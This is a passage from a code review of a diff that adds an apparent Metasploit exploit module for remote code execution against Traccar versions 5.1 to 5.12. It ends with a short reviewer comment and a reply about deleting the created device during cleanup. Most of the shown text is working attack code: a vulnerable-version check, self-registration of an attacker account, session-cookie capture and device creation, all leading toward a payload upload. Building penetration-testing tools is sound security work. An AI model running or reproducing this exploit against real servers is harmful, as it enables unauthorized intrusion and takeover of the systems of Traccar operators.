modules/exploits/linux/http/traccar_rce_upload.rb

```diff
@@ -0,0 +1,252 @@
+    end
+
+    unless Rex::Version.new(version).between?(Rex::Version.new('5.1'), Rex::Version.new('5.12'))
+      return CheckCode::Safe
+    end
+
+    return CheckCode::Appears
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+
+  def execute_command(cmd)
+    print_status('Registering new user...')
+    body = {
+      name: datastore['USERNAME'],
+      email: datastore['EMAIL'],
+      password: datastore['PASSWORD'],
+      totpKey: nil
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/users'),
+      'ctype' => 'application/json',
+      'data' => body
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    # not quite necessary to check for this, since we exit all cases that are not 200 below, but this is a common error
+    # to run into when this module is executed more than once without updating the provided email address
+    if res.code == 400 && res.to_s.include?('Unique index or primary key violation')
+      vprint_status(res.to_s)
+      fail_with(Failure::UnexpectedReply, 'Error: The same E-mail already exists on the system')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, res.to_s)
+    end
+
+    json = res.get_json_document
+
+    unless json['name'] == datastore['USERNAME'] && json['email'] == datastore['EMAIL']
+      fail_with(Failure::UnexpectedReply, 'Received unexpected reply:\n' + json.to_s)
+    end
+
+    print_status('Authenticating...')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/session'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'email' => datastore['EMAIL'],
+        'password' => datastore['PASSWORD']
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    jsessionid = res.get_cookies.scan(/JSESSIONID=([^;]+)/).flatten[0]
+    fail_with(Failure::UnexpectedReply, 'JSESSIONID not found.') unless jsessionid
+    vprint_status("JSESSIONID: #{jsessionid}")
+
+    json = res.get_json_document
+    unless res.code == 200 && json['name'] == datastore['USERNAME'] && json['email'] == datastore['EMAIL']
+      fail_with(Failure::UnexpectedReply, 'Received unexpected reply:\n' + json.to_s)
+    end
+
+    name_v = Rex::Text.rand_text_alphanumeric(16)
+    unique_id_v = Rex::Text.rand_text_alphanumeric(16)
+
+    body = {
+      name: name_v,
+      uniqueId: unique_id_v
+    }.to_json
+
+    print_status('Adding new device...')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/devices'),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      },
+      'ctype' => 'application/json',
+      'data' => body
+    )
```

Comment:
Is it possible to delete the device one the file is uploaded? If so, it'd make sense to store whatever you need to delete it in an instance var like `@device_info` and then check if it's set in the `#cleanup` method.

Reply:
Yes, the device can be deleted afterwards, thank you for the suggestion. I've updated the code accordingly.